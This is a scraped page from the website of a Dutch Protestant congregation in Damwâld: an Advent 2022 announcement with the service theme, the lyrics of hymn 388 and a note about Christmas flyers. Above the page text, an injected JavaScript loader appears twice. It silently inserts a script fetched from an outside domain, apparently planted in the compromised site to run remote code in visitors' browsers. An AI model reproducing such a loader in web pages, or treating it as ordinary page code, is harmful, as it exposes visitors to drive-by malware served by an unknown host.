;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Advent ! - PKN Damwâld

Advent !

Gepubliceerd op: vrijdag 9 december 2022

In deze adventstijd hebben onze kerkdiensten een apart tintje gekregen. Het thema is hetzelfde als voor dit kerkelijk jaar: “aan tafel”. De adventscommissie heeft eigen accenten in de diensten aan gebracht en gekeken hoe we naast de diensten elkaar kunnen ontmoeten; bijvoorbeeld aan tafel. Gebruik in deze Adventstijd ook de adventskalender die u bij de laatste Paadwizer ontving om elke dag mee te lezen. Zondag 11 december staat Elisabet centraal, de moeder van Johannes de Doper.

 

Themalied in de adventstijd is Lied 388: Voor ieder van ons een plaats aan de tafel

Voor ieder van ons een plaats aan de tafel,
voor ieder van ons schoon water en brood,
een veilige plek, een plaats om te schuilen,
een plaats in Gods licht als tafelgenoot.

Vol vreugde ziet God naar mensen die recht doen: zij scheppen geluk!
Vol vreugde ziet God naar mensen die recht doen: zij scheppen recht en geluk!

 

Kerstflyers – Ook dit jaar  worden er kerstflyers huis aan huis verspreid in Damwâld.  Met de kerstflyer hopen we onze dorpsgenoten welkom te heten in een van onze kerstdiensten. U kunt de kerstflyer hieronder dowloaden.

Bijlagen